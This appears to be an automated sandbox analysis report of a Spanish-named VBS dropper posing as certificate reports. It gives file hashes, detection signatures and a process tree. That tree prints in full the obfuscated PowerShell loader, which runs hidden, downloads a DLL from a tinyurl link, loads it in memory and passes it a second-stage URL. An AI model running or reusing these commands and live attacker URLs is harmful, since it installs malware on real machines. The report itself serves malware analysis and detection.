Analysis
- max time kernel: 47s
- max time network: 50s
- platform: windows7_x64
- resource: win7-20220901-en
- resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
- submitted: 10/10/2022, 15:45

Static task: static1

Behavioral task: behavioral1
- Sample: 0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
- Resource: win7-20220901-en
General
- Target: 0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
- Size: 201KB
- MD5: d31abe34b0270957dea045661492c0e3
- SHA1: ff2d86a0282fcb7db59040e7ad0b77890bd719fb
- SHA256: 041169b1bab3881a74211ccf368ab7e605a44257bc714fabae64b1c49878bd66
- SHA512: a93cf31ea7b162405b7c04c506b9944bdb6cf562fac0b22aa4e470bca499494bd09f6cd923a9111fb26de9df7dbae67468c20764a51f3ae28937478f33fdca5a
- SSDEEP: 96:dyYRYFYDnYFLvTfJZf4UbbNhtF/Zldy2ILS8414NEWUvWZ1+AN1qHk:d9uaOAy/ATm45ZJ1qE
Malware Config
- Extracted: https://tinyurl.com/2erph6cs
Signatures
- Blocklisted process makes network request (3 IoCs)
  flow  pid  Process
  4     688  powershell.exe
  6     688  powershell.exe
  7     688  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  1860  powershell.exe
  688   powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1860  powershell.exe
  Token: SeDebugPrivilege  688   powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                      pid   Process         procid_target
  PID 852 wrote to memory of 1860  852   WScript.exe     27
  PID 852 wrote to memory of 1860  852   WScript.exe     27
  PID 852 wrote to memory of 1860  852   WScript.exe     27
  PID 1860 wrote to memory of 688  1860  powershell.exe  29
  PID 1860 wrote to memory of 688  1860  powershell.exe  29
  PID 1860 wrote to memory of 688  1860  powershell.exe  29
Processes
- C:\Windows\System32\WScript.exe (PID: 852)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 1860)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwATIBQgFCCvAK8AFCCvABMgEyCvACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AH⌚⌚⌚AcgBsAC4AYwBvAG0ALwAyAG⌚⌚⌚AcgBwAGgANgBjAHMAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG⌚⌚⌚AdAB⌚⌚⌚AHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsA⌚⌚⌚ABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAF⌚⌚⌚AbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuADIAWABaAC8AcwByAG⌚⌚⌚AZgBvAG0ALwB3AG⌚⌚⌚AbgAvADQANwAuADAANQAuADMAMQAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACQAJQAmAC8ANQA2ADcA⌚⌚⌚gA3ADgANQA0AGYAcgBnAGgAagBrAHkAaAB0AHkAZgA1ADYANgA3ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('–——¯¯—¯––¯', 'C:\Users\Admin\AppData\Local\Temp\0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 688)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.2XZ/srefom/wen/47.05.312.19//:ptth' , $RodaCopy , '$%&/567R7854frghjkyhtyf5667' ))"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  - Filesize: 7KB
  - MD5: 6e9ce01bc1767deffc8269ac6e663dcf
  - SHA1: 3e428d6a27ac7bade2a9d06e76ffbe2291f2d271
  - SHA256: 8af2684fc374ee1f0eb429f922da12daad6c8903be2bd732922669bd73486633
  - SHA512: f4c8f128931f212d823f82ed56b70aab2d9d6c6f721f985823bbf0f28c3da4ae4a8285d7e73a0889a80c88189304f9e82a505858e19902545dede1ef71cdef51